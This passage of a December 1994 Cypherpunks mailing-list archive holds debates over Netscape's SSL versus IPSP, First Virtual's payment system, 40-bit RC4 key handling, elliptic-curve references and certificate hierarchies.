other commerce mechanism that would meet our needs, so we built one. We expect to make our money on information products, not on the commerce engine. We also don't think cryptography and anonymity are bad. If you would just read our materials, you will see that we think that cryptography is problematic and that anonymity is good. We've strived for the maximum possible anonymity without the problems we perceive in using cryptography. (And FYI, we know whereof we speak: we use cryptography heavily internally, and we are extremely aware both of its power and utility AND of the practical difficulties in its use.) > So, I ask, First Virtual is looking better and better for doing > _what_? Until they deal with the interface problem (get a decent > client, rather than relying exclusively on e-mail), I think > they're not even going to be adequate for getting shareware-scale > proceeds from putting up a cool Web page. Please check out our Web pages before you make any more comments like this one. You can buy stuff today from our Infohaus, using Web or FTP access, or email if you prefer, so it's pretty silly to say that we rely exclusively on email. (Actually, the email interface is the LEAST usable.) The people selling things on our Infohaus -- who are NOT associated with FV in any way other than as our customers -- get paid in REAL MONEY. Tell *them* that the system isn't adequate. Or tell it to my in-laws, who are now getting monthly loan repayments (real money) from me via a cron job that I set up on my own machine at home (Setting up such a job requires no special FV intervention -- anyone who knows how to set up a cron job can do it, it's that easy. This stuff really works, check it out!) > FV may be more operational, although I'm curious if any transactions have managed to fully settle yet... We haven't been up for 90 days yet, so no funds have passed the aging period. I'll suggest to our PR people that they make a big deal about the first settlement to sellers, which should happen in January... > The two systems are worlds apart in terms of where the risk is placed. > FV places the risk entirely on the vendor; DigiCash places the risk > entirely on the e-cash holder. Note that lots of people walk around with > credit cards, bills _and_ coins in their wallets, and use them for different > things throughout the day. I don't think that things are going to be > that different on the net. Hey, we agree on something! Different mechanisms for different purposes makes perfect sense. This is why you won't, in general, find us bad-mouthing any of the other systems -- we think there's room for several payment mechanisms on the net, and don't see any purpose being served by "taking the low road". I'm happy to note that the folks behind the other systems seem to be taking a similar approach. I hope we can all keep it up. > I think that if people want try before you buy, it can be done > (easily) without building it into the payment protocol. I'm > all for shareware, giving freebies so folks get hooked, and > so forth, but it seems odd to build a unconditional rejection into > the payment system, especially for products that can't be > returned in any meaningful sense. Of course it can be done without bundling it into the payment protocol. You've missed a critical point: By "bundling" it into the payment protocol, we have been able to achieve a vast SIMPLIFICATION of the payment protocol. It is not a coincidence that we are the first (and so far, still the only) system that is operational with real money. It's because we set out to implement that subset of commerce that was amenable to rapid deployment. Try-before-you-buy permits a vastly simplified commerce system, but nobody should be surprised if that commerce system is ONLY useful in situations where try-before-you-buy is acceptable! > don't get me wrong here! I _have_ read the web pages, and I > note that you still have to pop into your e-mail to approve the > purchase. This is an inherent flaw to the protocol, that there > will be 2-3 user-side software components, instead of 1-2 with > DigiCash: You've read them, but you don't appear to have understood them, which is probably our fault, not yours. The email confirmation is indeed a bit cumbersome if it gets invoked very often and your mail system isn't FV-smartened. But if you use an FV-smart mail tool -- and note that Z-code recently became the first vendor to publicly announce and demonstrate support for our protocols -- you can get this down to where a single mouse click authorizes a dozen or so purchases. Not a big deal. You could even have an intelligent agent do the authorization for you in some cases, although this requires some real caution! > I'm assuming that over time, the TCP/IP payment methods will be > integrated into browsing software, but FV will always be hampered > by the need to have something separate to handle the back-channel, > since they are religiously opposed to using signatures for > validation (although you suggest some progress in this area). You can already browse by Web or FTP, so "over time" == "now". Once again, we're not OPPOSED (religiously or otherwise) to using digital signatures, we're just opposed to making electronic commerce wait for the widespread deployment of signature technologies. When such technologies are widely deployed, we'll probably use them (though this is not a promise, it will depend on the situation at the time). Sorry for the length of this message -- I hope it clears up a few misconceptions. -- Nathaniel PS -- Doug, please tell the folks at Tadpole that your mailer is not doing a very good job generating Message-ID headers. In particular, it isn't getting the domain right in the Message-ID, which can be a problem for Message-ID uniqueness. Specifically, instead of <9412021548.AA17294 at tadpole> it should really be <9412021548.AA17294 at tadpole.com> It's just a nit, but these little details do matter, and if you tell me what mail tool you're using, I might be able to tell you how to fix it. -- NB From kipp at warp.mcom.com Tue Dec 13 10:36:36 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 13 Dec 94 10:36:36 PST Subject: the netscape/ssl controversy Message-ID: <9412131834.AA18515@warp.mcom.com> In article <199412131448.JAA07613 at cutter.clas.ufl.edu>, you write: > have to get my two cents in: > > netscape has a proposal that secures the *transport* of files. pgp and > the like secure the actual files themselves. the question that will > have to be answered is "which method of security is more valuable to > the internet as a whole?" > > of course i have made up my mind, but i'll waste some space and share > those thoughts here. > > ...much elided... > > so while ssl may well be a wonderful protocol, it does not address the > problems that many cypherpunks see as being real. i think it would do > netscape good to listen to and consider the views of many on this > list, as they have many genuinely good ideas, even if they choose a > confrontational manner. My personal opinion is that using MIME encoded documents with embedded security information including digital signatures combined with SSL or other trasport layer security, will be a reasonable solution. Please check out: ftp://ds.internic.net/internet-drafts/draft-ietf-pem-sigenc-02.txt and ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-07.txt --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From eric at remailer.net Tue Dec 13 10:43:14 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 13 Dec 94 10:43:14 PST Subject: IPSP and Netscape In-Reply-To: <9412131807.AA18482@warp.mcom.com> Message-ID: <199412131940.LAA02454@largo.remailer.net> From: kipp at warp.mcom.com (Kipp E.B. Hickman) IPSP was not in my vocabulary at the time of the first posting. Ignorance was briefly bliss :^) This indeed was exactly the problem. Might I suggest that a some amount of acknowledgement of the outside world and a survey of existing work would solve most of Netscape's PR problems on this list? Eric From perry at imsi.com Tue Dec 13 10:45:35 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 10:45:35 PST Subject: BofA + Netscape In-Reply-To: <199412131814.KAA07205@jobe.shell.portal.com> Message-ID: <9412131845.AA12626@snark.imsi.com> anonymous-remailer at shell.portal.com says: > Does anybody remember PGP 1.0? Released in the summer of 1991, using > the Bass-O-Matic cipher... which was worthless. > > This list didn't come into existence until around the same time PGP > 2.0 came out. Thus, nobody railed against the weaknesses of PGP like > they are railing against NetScape. Imagine if someone proposed Bass-O-Matic today, however. Well, we have better technologies than SSL today -- IMPLEMENTED AND AVAILABLE -- so they aren't pioneering -- they are going retrograde. Perry From kipp at warp.mcom.com Tue Dec 13 10:47:45 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 13 Dec 94 10:47:45 PST Subject: More 40-bit RC4 nonsense Message-ID: <9412131845.AA18544@warp.mcom.com> In article <199412131742.JAA27330 at netcom5.netcom.com>, you write: > -----BEGIN PGP SIGNED MESSAGE----- > > If I recall correctly, the first byte out of the RC4 stream has > about a 40% chance of being the first byte of the key. Thus, if the > 40-bit "secret" part of the key is the _beginning_ of the full 128-bit > key, then the keyspace is effectively reduced by about seven bits, > meaning that I would be able to crack a key on my PC in a couple of > days or so. > Of course, if the "clear" 88 bits went first, there would be no > advantage whatsoever. The SSL document very carefully does not say > how they combine the two key parts to form the 128-bit key. Does > anyone know? > > Raph > > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQCVAwUBLu3cI/4BfQiT0bDNAQEToQQAtcy2v0sBd+g5GBrm+Pa1AykqS4tTctfu > EYga7kPry4wvGmI7/HpD+SVVDQRcJe+O9CxH9cpvRgBRIBhyvsFXVBSTW0OTJgXb > 1bYh5qerD5J/gXAs0XWIp0+Hj8GqeTIRkFTseU4MDcDfQ7tOSEFvul97iSNYIytX > AMkmAEmMXxU= > =S80T > -----END PGP SIGNATURE----- OOPS. This is a spec ommission. The clear key data (aka "salt") is combined with the secret portion as follows: The bytes of the salt are concatenated with the secret portion with the secret portion making up the least significant bytes of the concatenation. I will spec'ize the english... By the way, where did this 40% number come from? For some reason RSA never told me this... :^( --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From rsalz at osf.org Tue Dec 13 10:48:46 1994 From: rsalz at osf.org (Rich Salz) Date: Tue, 13 Dec 94 10:48:46 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412131844.AA13693@sulphur.osf.org> > Please define a solution that is: > distributed > reliable > supports an unforgeable name to public-key mapping > standard > not-bulky > not-expensive Build a new API out of sockets and GSSAPI? ssl_t s = ssl_bind(char *hostname, int port, char *servername); ssl_status_t ssl_secure(ssl_t s, oid_t security_type, unsigned32 flags); etc... /r$ From jcorgan at netcom.com Tue Dec 13 10:48:47 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Tue, 13 Dec 94 10:48:47 PST Subject: BofA+Netscape Message-ID: > Is that the same Microsoft that brought us Edlin??? Wasn't edlin based on the Unix ed? From rsalz at osf.org Tue Dec 13 10:50:12 1994 From: rsalz at osf.org (Rich Salz) Date: Tue, 13 Dec 94 10:50:12 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: <9412131824.AA13662@sulphur.osf.org> > AMS is pretty strongly tied to AFS (now known as part of DCE) At some levels DCE's distributed file system (DFS) is "AFS version 5" (sic), but not really. The original intent was that DFS was AFS with the IPC replaed with secure DCE RPC, but there's a whole mess of protocol changes since then. They're different beasts. /r$ From perry at imsi.com Tue Dec 13 10:50:13 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 10:50:13 PST Subject: IPSP and Netscape In-Reply-To: <9412131807.AA18482@warp.mcom.com> Message-ID: <9412131849.AA12640@snark.imsi.com> Kipp E.B. Hickman says: > I'm sorry you are so upset. :-( > > IPSP was not in my vocabulary at the time of the first posting. Ignorance > was briefly bliss :^) My complaint about Netscape is that you guys haven't been reading about what others have done. I understand your desire to get things done quickly, but you are making assumptions about whats out there and what works that aren't warranted. > However, regardless of whether or not extant hardware is reusable, > there is still the not so small matter of software. Software for PC's, > MAC's and a host of UNIX machines before a workable secure network can > be constructed. Certainly. SSL would also require software for all those platforms -- its no different in this regard. > Finally, I never said that "SSL is better than anything out there". I > don't know who did. All I said is that "SSL is something", which isn't > really saying much. SSL is A solution to A set of problems, namely > privacy and authentication. Privacy and authentication are also provided by IPSP. However, IPSP provides all sorts of advantages -- immunity from traffic analysis, no requirement to change the way an application operates to start using it, protection of the entire IP stack (not just TCP sockets), very minimal changes required to applications that want to use the information provided by the IPSP layer for authentication (and no need to change your read or write calls or anything), etc, etc, etc. Perry From perry at imsi.com Tue Dec 13 10:51:19 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 10:51:19 PST Subject: What, exactly is elliptic encryption? In-Reply-To: <199412131842.KAA02350@largo.remailer.net> Message-ID: <9412131850.AA12653@snark.imsi.com> Eric Hughes says: > From: "Perry E. Metzger" > Basically, there are ways of extending public key methods into fields > other than the integers modulo some prime > > Small correction. While integer modulo a prime are fields (i.e. they > have division), elliptic curve solutions only have a group structure, > which is usually written as addition. I stand corrected... .pm From adam at bwh.harvard.edu Tue Dec 13 10:52:50 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 13 Dec 94 10:52:50 PST Subject: Authentication vs encryption: CPs on the web In-Reply-To: <199412131744.JAA04700@jobe.shell.portal.com> Message-ID: <199412131851.NAA22099@bwnmr5.bwh.harvard.edu> With all due respect, I disagree with your assessment. Anonymity is a job, and we should build small tools to do jobs. It is my feeling that building anonymity into the web will make the protocols more complex than they need to be. There is no anonymity in mail, but we have anonymous mail of varying privacy. I suspect mixmaster will greatly enhance that. To get privacy in the web, build a web remailer on top of the CERN or TIS HHTPd proxies. Encrypt between you & the proxy, let the proxy go out. Adam | This is IMO the standard cypherpunks wish list as applied to the WWW. | But it does not seem to match up with either the commercial or | institutional interests which are driving the standards process. I | hope those CP's who are involved in these efforts can work to spotlight | the need for individual privacy. We should give as much power, choice, | and control as possible to the individual end-users of the web. | Otherwise privacy is going to be very difficult to maintain in this | world of electronic commerce. | | Hal Finney | hfinney at shell.portal.com -- "It is seldom that liberty of any kind is lost all at once." -Hume From jamesd at netcom.com Tue Dec 13 10:54:24 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 13 Dec 94 10:54:24 PST Subject: James Donald's comments In-Reply-To: <9412131431.AA07769@webster.imsi.com> Message-ID: <199412131852.KAA23951@netcom10.netcom.com> Perry E. Metzger writes > > James Donald has claimed that I've been talking about vaporware and > that Netscape has produced "real cool crypto for the masses". I am sorry if I seemed to be saying that: I well know that that is not true. But right now today everyone one the net who sends out a form through netscapes 0.96 web browser gets a warning that his form is not encrypted, with the implication that it should be. (Unless he turns off the warning.) Thus millions of people are being exposed to cryptography. What I meant to say is that Netscape is bringing Crypto to the *masses* and you are not. I did not intend to say that Netscape is bringing Crypto and you are not. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From perry at imsi.com Tue Dec 13 10:57:43 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 10:57:43 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <9412131857.AA12682@snark.imsi.com> Johnathan Corgan says: > > Is that the same Microsoft that brought us Edlin??? > > Wasn't edlin based on the Unix ed? No. .pm From kipp at warp.mcom.com Tue Dec 13 10:59:28 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 13 Dec 94 10:59:28 PST Subject: IPSP and Netscape In-Reply-To: <9412131849.AA12640@snark.imsi.com> Message-ID: <9412131057.ZM18561@warp.mcom.com> On Dec 13, 1:49pm, Perry E. Metzger wrote: > Subject: Re: IPSP and Netscape > > Kipp E.B. Hickman says: > > I'm sorry you are so upset. :-( > > > > IPSP was not in my vocabulary at the time of the first posting. Ignorance > > was briefly bliss :^) > > My complaint about Netscape is that you guys haven't been reading > about what others have done. I understand your desire to get things > done quickly, but you are making assumptions about whats out there and > what works that aren't warranted. I think you may have jumped to a conclusion here that is unwarranted. We are a small company with limited experience and capacity. We did what we thought was appropriate, however it may seem now. > > However, regardless of whether or not extant hardware is reusable, > > there is still the not so small matter of software. Software for PC's, > > MAC's and a host of UNIX machines before a workable secure network can > > be constructed. > > Certainly. SSL would also require software for all those platforms -- > its no different in this regard. True. However, we have found a way to get it to the masses quickly. System software is inherently more difficult to distribute, and consequently takes more time. When I was doing operating system work at SGI, it was often a year before the customer base would see the fruits of my labor. However, with Netscape, things are faster and it is easier to get people to load an "application" than it is to load a new winsock/kernel. The delivery vehicle is very important to the marketplace. In my mind, SSL and IPSP are two solutions with very similar properties. However, SSL can be implemented at the application layer. I'm not certain if IPSP can, and I'm also not certain that if it could, people would be as happy with it. A (probably naive) question: If IPSP is essentially "tunnelling", don't sysadmin's and the like get concerned that now their fancy routers etc. can no longer shield certain classes of unwanted traffic? > > Finally, I never said that "SSL is better than anything out there". I > > don't know who did. All I said is that "SSL is something", which isn't > > really saying much. SSL is A solution to A set of problems, namely > > privacy and authentication. > > Privacy and authentication are also provided by IPSP. However, IPSP > provides all sorts of advantages -- immunity from traffic analysis, no > requirement to change the way an application operates to start using > it, protection of the entire IP stack (not just TCP sockets), very > minimal changes required to applications that want to use the > information provided by the IPSP layer for authentication (and no need > to change your read or write calls or anything), etc, etc, etc. These are all good properties. As with any technology, it takes time to deploy. When these capabilities are the norm instead of the rarity, SSL will no longer be needed, except as a compatability crutch. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From adam at bwh.harvard.edu Tue Dec 13 11:00:37 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 13 Dec 94 11:00:37 PST Subject: IPSP and Netscape In-Reply-To: <9412131807.AA18482@warp.mcom.com> Message-ID: <199412131900.OAA22550@bwnmr5.bwh.harvard.edu> Kipp wrote: | IPSP was not in my vocabulary at the time of the first posting. Ignorance | was briefly bliss :^) My, this is a _tasty_ burger. | However, regardless of whether or not extant hardware is reusable, | there is still the not so small matter of software. Software for PC's, | MAC's and a host of UNIX machines before a workable secure network can | be constructed. It is a good thing that IPSP requires only software to | meet it's goals. This same property is true of SSL. | | Finally, I never said that "SSL is better than anything out there". I | don't know who did. All I said is that "SSL is something", which isn't | really saying much. SSL is A solution to A set of problems, namely | privacy and authentication. I'm not sure I understand. Could you explain what you mean by privacy, and how it is maintained by SSL? (My question, obviously, is informed by Hal's recent comments on privacy.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From klbarrus at owlnet.rice.edu Tue Dec 13 11:04:12 1994 From: klbarrus at owlnet.rice.edu (Karl Lui Barrus) Date: Tue, 13 Dec 94 11:04:12 PST Subject: What, exactly is elliptic encryption? In-Reply-To: <199412130621.AAA07346@pentagon.io.com> Message-ID: <9412131903.AA13409@snowy.owlnet.rice.edu> dfloyd at io.com wrote: >What, exactly is elliptic curve encryption? Well, some other have already described it. I'll list some references I've found: A Course in Number Theory and Cryptography, 2nd edition, Neal Koblitz, Springer-Verlag. Chapter 6 is titled "Elliptic Curves" and is split into four parts: basics, cryptosystems, factorization, primality testing. Elliptic Curve Public Key Cryptosystems, Alfred Menezes, Kluwer Academic Publishers. Haven't had a chance to read this book yet. Looks pretty good though :) Algorithms for Modular Elliptic Curves, J. E. Cremona, Cambridge University Press. Found this book last week, along with the above mentioned Menezes book. Likewise, I haven't had a chance to read it yet. It is divided into three parts: description of contructing elliptic curves, a collection of algorithms, a huge list of tables. The algorithms are either in Fortran or in pseudocode (unless the Fortran used allows semicolons and the sh-like FI keyword). >(Only thing I knew that the NeXT nearly had it in its OS, but >the heavy hammer of ITAR squashed that...) Yeah, for a while a friend and I tried getting that to work, but we were never successful. Then, in an version upgrade, the encryption disappeared ;) -- Karl L. Barrus: klbarrus at owlnet.rice.edu 2.3: 5AD633; D1 59 9D 48 72 E9 19 D5 3D F3 93 7E 81 B5 CC 32 2.6: 088C8F21; 97 73 9E 8B 98 3E DD B5 E8 97 64 7E 20 95 60 D9 "One man's mnemonic is another man's cryptography" - K. Cooper From kipp at warp.mcom.com Tue Dec 13 11:05:44 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 13 Dec 94 11:05:44 PST Subject: IPSP and Netscape In-Reply-To: <199412131900.OAA22550@bwnmr5.bwh.harvard.edu> Message-ID: <9412131103.ZM18575@warp.mcom.com> On Dec 13, 2:00pm, Adam Shostack wrote: > Subject: Re: IPSP and Netscape > Kipp wrote: > > | IPSP was not in my vocabulary at the time of the first posting. Ignorance > | was briefly bliss :^) > > My, this is a _tasty_ burger. > > | However, regardless of whether or not extant hardware is reusable, > | there is still the not so small matter of software. Software for PC's, > | MAC's and a host of UNIX machines before a workable secure network can > | be constructed. It is a good thing that IPSP requires only software to > | meet it's goals. This same property is true of SSL. > | > | Finally, I never said that "SSL is better than anything out there". I > | don't know who did. All I said is that "SSL is something", which isn't > | really saying much. SSL is A solution to A set of problems, namely > | privacy and authentication. > > I'm not sure I understand. Could you explain what you mean by > privacy, and how it is maintained by SSL? (My question, obviously, is > informed by Hal's recent comments on privacy.) SSL provides "channel" privacy. The two endpoints which are communicating can be ensured of three basic properties: 1. You are certain who you are talking to (server authentication) 2. Your conversation with the server is private (privacy using encryption) 3. Your conversation cannot be interfered with (data integrity) That is all SSL does. MIME multipart encoding used on documents can provide deeper encryption, tamper-proof document storage, etc. There are up and coming standards for these actions. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From jamesd at netcom.com Tue Dec 13 11:06:07 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 13 Dec 94 11:06:07 PST Subject: the netscape/ssl controversy In-Reply-To: <199412131448.JAA07613@cutter.clas.ufl.edu> Message-ID: <199412131904.LAA25368@netcom10.netcom.com> Avi Harris Baumstein writes > netscape has a proposal that secures the *transport* of files. pgp and > the like secure the actual files themselves. the question that will > have to be answered is "which method of security is more valuable to > the internet as a whole?" No. Both methods are valuable. Netscape has provided a screwdriver. People are screaming at them for not producing a hammer. They are planning the hammer later. We do not have to choose. The more tools, the better. The correct response is "Thanks, but what we really want is a hammer." Not "You stupid assholes, if you had the brains of a turnip you would know that a screwdriver is THE WRONG TOOL AND THE RIGHT TOOL IS A HAMMER, YOU HALF WITTED MORONS." -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From anonymous-remailer at shell.portal.com Tue Dec 13 11:09:03 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Tue, 13 Dec 94 11:09:03 PST Subject: unix and windows Message-ID: <199412131908.LAA12642@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- > As to the general issue of MSWindows v. Unix, the Unix predominance > for remailer software involves the fact that Unix is on the bulk of > the machines connected to the Internet. It's more reliable for > offering network services than MSWindows and it's got a cleaner > architecture for reconfiguration. None of these explanations, > however, means that there won't be more MSWindows that Unix boxes for > a long time. True. But I think the "balance of power" (actually, balance of numbers) will shift in the future. I make an analogy with manual transmission. For years, if you wanted to drive, manual transmission was the only choice. When automatic transmissions appeared, people scoffed. Now, automatic transmission dominate, and 20% of the driving population prefers manual transmission. For years, if you wanted internet connectivity, Unix was the only choice. When Warp, Windows NT, and Windows 95 (to be released ;) appeared, people scoffed. In the future, 20% of the internet connected will still prefer Unix for some reason. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu3w8sSF/V8IjI8hAQFdcwQAm00BIeO9ySbZSQAY8QMkF/TlSaR+FsL0 1Ekm27s5G/WzXrOaekMvy0WGGmYJ2/aoFBj2GSSgonxqB8PKTxZtSuSSWeMPszVa evpwrNi3IfcV1lpyBCPVYRmLO3x4zigMjOpG25Ji2DNfVp/Mrda9lNUYo9dodkiT o4rO3dtlZss= =+DOl -----END PGP SIGNATURE----- From perry at imsi.com Tue Dec 13 11:11:12 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 11:11:12 PST Subject: IPSP and Netscape In-Reply-To: <9412131057.ZM18561@warp.mcom.com> Message-ID: <9412131910.AA12716@snark.imsi.com> "Kipp E.B. Hickman" says: > A (probably naive) question: If IPSP is essentially "tunnelling", > don't sysadmin's and the like get concerned that now their fancy > routers etc. can no longer shield certain classes of unwanted > traffic? You are right that an encrypted IPSP packet can't be "peeked into" and thus can't be selectively blocked by a filtering router. There is, however, a notion in the IPv6 version (will be in the v4 version if I have anything to do with it) of a "transparent authentication header" which allows you to achieve authentication without privacy for those situations that require the ability to filter packets at a firewall. Overall, however, IPSP reduces (but does NOT by any means eliminate) the need for firewalls, because IPSP packets can be fully private and authenticated and thus can't be hijacked. Perry From jamesd at netcom.com Tue Dec 13 11:14:56 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 13 Dec 94 11:14:56 PST Subject: BofA+Netscape In-Reply-To: <9412131442.AA12105@snark.imsi.com> Message-ID: <199412131914.LAA26551@netcom10.netcom.com> > Marc Andreessen says: > > Great, IPSP looks fantastic and we look forward to supporting it > > as it moves through and beyond the "near" phase. Perry E. Metzger writes > Given that you haven't read any IPSP documents, I can only interpret > your comments as sarcasm. If they aren't sarcasm, they represent more > of the same "why bother to do any research" attitude that got you into > trouble in the first place. Perry, they are not in trouble. They are the number one supplier of the internet killer app. The plug for crypto that they have placed in Netscape 0.96 is the number one force bringing crypto awareness to the masses. He said that Netscape would look at IPSP when it was beyond the "near" phase. The correct response is "Gee that is great. Here are some working demo systems, and some slabs of documentation." Your salesmanship leaves something to be desired. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From acspring at knoware.nl Tue Dec 13 11:16:56 1994 From: acspring at knoware.nl (Andrew Spring) Date: Tue, 13 Dec 94 11:16:56 PST Subject: Announcing - The DigitaLiberty Forum Message-ID: <9412132018.AA14024@indy.knoware.nl> >I am certain that the nattering nabobs of negativism would take issue >with the mainstream miasma of majoritarianism. Sigh. Sometimes I miss Spiro Agnew. ObCryptoContent. SPIRO AGNEW is an anagram of GROW A PENIS -- Man! Woman! Child! All! are up against the WALL of SCIENCE! PGP Key print:4C 17 EC 47 A1 6D AF 67 F3 B4 26 24 FE B2 0F 5E From amanda at intercon.com Tue Dec 13 11:30:51 1994 From: amanda at intercon.com (Amanda Walker) Date: Tue, 13 Dec 94 11:30:51 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412131431.AA19841@amanda.dial.intercon.com> > All you need to do is get your server certificate from one of > several places, including: > > RSA (commercial CA or server CA) Do you need a server certificate issued directly by one of these PCAs, or does it just need to be rooted there (i.e., can I use my [hypothetical] corporate PCA, which itself has a certificate from the RSA commercial PCA)? If it's the former, I would strongly urge you to extend your clients to include the latter. I don't want to have to go to RSA for every server certificate--that's in part what the PCA hierarchy exists for. Similarly, if I set up a personal server (with my home page, for example), can I'd like to be able to use a certificate issued by the RSA Unaffiliated User CA, which is itself a PCA certified by the Commercial CA. Amanda Walker InterCon Systems Corporation From raph at netcom.com Tue Dec 13 11:32:16 1994 From: raph at netcom.com (Raph Levien) Date: Tue, 13 Dec 94 11:32:16 PST Subject: More 40-bit RC4 nonsense Message-ID: <199412131931.LAA27397@netcom9.netcom.com> Sticking my foot in my mouth, I wrote: > If I recall correctly, the first byte out of the RC4 stream has > about a 40% chance of being the first byte of the key. Thus, if the Wrong. It _is_ true that the first byte of the key has a 40% probability of being the first byte of the initial state vector. It is _not_ true that the first byte of the initial state vector is the first byte out of the RC4 stream. Next time I will check the (alleged) source code before making a fool of myself. Thus, my attack shortcut will not work. Kipp Hickman informs me that the salt is concatenated with the secret part in such a way that the secret portion is least significant. This seems wise because of the key/statevector characteristic, but wouldn't make too much difference either way in practice. Sorry for the confusion. Raph From kipp at warp.mcom.com Tue Dec 13 11:33:57 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 13 Dec 94 11:33:57 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412131431.AA19841@amanda.dial.intercon.com> Message-ID: <9412131132.ZM18680@warp.mcom.com> On Dec 13, 2:31pm, Amanda Walker wrote: > Subject: Re: Clarification of my remarks about Netscape > > All you need to do is get your server certificate from one of > > several places, including: > > > > RSA (commercial CA or server CA) > > Do you need a server certificate issued directly by one of these PCAs, or does > it just need to be rooted there (i.e., can I use my [hypothetical] corporate > PCA, which itself has a certificate from the RSA commercial PCA)? Unfortunately, for now, we only support cert's directly issued from the imbedded CA's. One level deeper is not trustworthy in any case, unless you make the user define trust. That requires a GUI and we haven't done that yet. > If it's the former, I would strongly urge you to extend your clients to > include the latter. I don't want to have to go to RSA for every server > certificate--that's in part what the PCA hierarchy exists for. We agree, and someday this won't be a problem. > Similarly, if I set up a personal server (with my home page, for example), can > I'd like to be able to use a certificate issued by the RSA Unaffiliated User > CA, which is itself a PCA certified by the Commercial CA. I didn't bother imbedding the RSA Unaffiliated User CA because I didn't think server operators would use it to get certificates. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From jamesd at netcom.com Tue Dec 13 11:37:40 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 13 Dec 94 11:37:40 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412131428.AA12085@snark.imsi.com> Message-ID: <199412131937.LAA00857@netcom10.netcom.com> > > I wrote: > > But reality is that they have produced by far the coolest browser > > there is, and they are bringing crypto to the masses, and you, > > and Eric Hughes, and most of us, have not yet brought crypto > > to the masses. Perry E. Metzger writes > You claim we haven't done anything and Netscape has. Not what I claimed. > > ftp.csua.berkeley.edu has the swIPe code sitting right on it. > > Its being deployed by TIS in their new firewall products I claimed you have not deployed crypto to the masses and they have. I did not claim that you have not deployed crypto and and they have. I am sick of you misrepresenting what I say, and I am sick of Eric misrepresenting what I say. Cut it out. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From sandfort at crl.com Tue Dec 13 11:49:21 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 13 Dec 94 11:49:21 PST Subject: THROUGH THE LOOKING GLASS Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Bob Snyder's recent post suggested that my argument in favor of wiring the cops could be use to support wiring of civilians or employees. Not so. Police are public officials. As such, they have no right to privacy *with respect to their public acts*. When off duty, cops have the same right as other citizens to privacy in their private lives. I said my proposal was "anti- *bad* cop" and that it would benefit good cops. Do I need to say that it would only benefit good cops in the line of duty? It would be bad for anyone--cops or civilians--in their private lives. Employees represent an intermediate position. If an employer is foolish enough to require that employees be wired, 'sokay with me. For most employees in most jobs, it would not be acceptable. I think they would get jobs with less intrusive employers. Some employers will wire some employees, whether or not the police are wired. Wiring the cops is a good idea; arguments about wiring employees and citizens are nothing more than red herrings used to avoid addressing the real issue of police accountability. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From sandfort at crl.com Tue Dec 13 11:52:54 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 13 Dec 94 11:52:54 PST Subject: ABSOLUTELY NOTHING ABOUT ERIC OR JAMES IN THIS POST... Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Paul Ste. Marie offered an interesting suggestion to the use of vital signs transmitted from wired cops: ... such a device would, when worn by an officer in court, essentially become a broadcast polygraph... 